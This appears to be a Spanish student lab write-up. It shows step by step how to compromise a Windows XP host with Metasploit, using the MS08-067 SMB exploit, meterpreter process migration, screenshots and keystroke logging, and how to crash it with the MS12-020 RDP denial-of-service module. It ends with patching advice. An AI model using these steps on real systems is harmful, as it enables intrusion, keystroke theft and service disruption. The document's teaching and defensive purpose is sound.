ACLARACIÓN:
El siguiente ataque tiene fines académicos, no nos responsabilizamos del uso que se le dé a esta información. Nuestro propósito es dar a conocer esta técnica para que usted se proteja de ataques similares.

INTRODUCCIÓN:
Este ataque consiste en explotar las vulnerabilidades de los diferente sistemas operativos y programas o software contenidos en él, y mediante estas obtener privilegios o el control total del equipo o PC víctima.

OBJETIVOS:
Detectar las falencias y vulnerabilidades de los equipos mediante el uso de la herramienta METASPLOIT que se encuentra contenida en la distribución de Linux “Back trac 5 R2”

ALCANCE:
Este ataque se lo puede llevar a cabo a nivel de una red local LAN.

DIAGRAMA DEL ATAQUE:


GLOSARIO DE TÉRMINOS:

Metasploit:

Es un proyecto open source de seguridad informática que proporciona información acerca de vulnerabilidades de seguridad y ayuda en tests de penetración y en el desarrollo de firmas para Sistemas de Detección de Intrusos. También denominado MSF (Metasploit Framework).

Meterpreter:
El meterpreter o meta intérprete es una familia de plugins avanzados para utilizar sobre sistemas Windows comprometidos que tienen como característica fundamental que todo es cargado en la memoria del sistema sin crear ningún proceso adicional. Además aporta mucha flexibilidad, permitiendo mil y una funciones al alcance de un sólo comando, con lo que nos permite realizar los ataques haciendo algo menos de ruido.

Payloads:

Esta es una de las cosas mas importantes, es la accion que se va a realizar si se logra explotar la vulnerabilidad que seleccionamos

Exploits:

Aquí encontramos todos los exploits disponibles en MSF y que podemos utilizar. Estandividos por SO’s y categoriras. Ejemplo: exploits/windows/browser/ y aquí econtrariamos los exploits disponibles para los navegadores que corren en el SO windows.

¿Qué es una vulnerabilidad?
Una vulnerabilidad es un agujero de seguridad en una pieza del sistema de software, hardware o de funcionamiento que proporciona un ángulo potencial para atacar el sistema. Una vulnerabilidad puede ser tan simple como contraseñas débiles o tan complejo como desbordamientos de búfer o vulnerabilidades de inyección SQL.

TUTORIAL:

IP Victima

Ports Equipo Victima

Conexión IP Equipo Atacante

Ip Equipo Atacante

Conexión IP Equipo Victima

Ports IP Equipo Victima

Realizamos el escaneo de puertos disponibles en el equipo victima para identificar la puerta (port available) para efectuar la intrusión. Utilizamos el comando nmap para efectuar la operación.

Metasploit

Una vez identificados los puertos disponibles realizamos el proceso de detección mediante el comando msfconsole, desde el prompt de BackTrack 5.

Ataque Equipo Victima

Afectando Vulnerabibildad PORT 445

ATAQUE SCREENSHOT

Utilizamos el siguiente comando use exploit/windows/smb/ms08_067_netapi el cual se utiliza para tener acceso y controlar según se desee.

Seteamos los valores antes de ejecutar el ataque (exploit)

1.- set LHOST 192.168.15.128 (IP Equipo Atacante)

2.- set RHOST 192.168.15.129 (IP Equipo Víctima)

3.- exploit (Efectuar el ataque)

4.- meterpreter > (Prompt que indica que estamos listos para efectuar cualquier tipo de acción en el equipo Victima)

 

Mostramos los procesos de la victima con el comando ps.

Capturamos el proceso explorer, cual obtenemos su PID, (process id). En este caso es el 1704.

Digitamos migrate 1704 el cual capturamos el contexto del usuario para obtener los privilegios.

Realizamos la captura de la pantalla remota mediante el comando screenshot.

Captura del Windows XP

ATAQUE KEYLOGGER

Este ataque consiste en capturar las teclas que ha pulsado la victima. Usaremos el comando keyscan_start

Digitamos una entrada de teclado en la pc vitima

Luego en la pc atacante con el comando keyscan_dump observamos lo que ha digitado la victima.

ATAQUE DE ESCRITORIO REMOTO

Este ataque consiste en reiniciar la pc victima con el típico pantallazo azul, mediante una vulnerabilidad detectada en el puerto 3389 del protocolo de escritorio remoto en los sistemas operativos windows. Utilizamos la siguiente instrucción use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 

Posterior a eso debemos especificar la ip Victima mediante set RHOST 192.168.15.129

Y ejecutamos la acción con el comando run efectuamos el ataque obteniendo el típico pantallazo azul común desde windows 3.1.  :(

 

 

 

 

Video:

http://www.youtube.com/watch?v=kJtt8oNdEyw&feature=youtu.be

CONCLUSIONES.

Se observa lo sencillo que puede ser caer un sistema, software y lo fácil que es configurar Metasploit para realizar diversos ataques en el equipo victima con conocimientos básicos.

RECOMENDACIONES.

Siempre es importante tener actualizado su sistema operativo, aplicaciones, etc para no ser victima de este tipo de ataques, vulnerabilidades. Se recomienda el buen uso de aplicaciones de control como antivirus, firewalls, actualizaciones periódicas.

INTEGRANTES:

Carlos Quiñonez          @carlosqsar

Fabricio Pinargote      @FabrizzioAP

Henry Quiñonez          @henqui71

Jose Hidalgo               @jghf1983

Rosa Espinoza            @rosaespinozab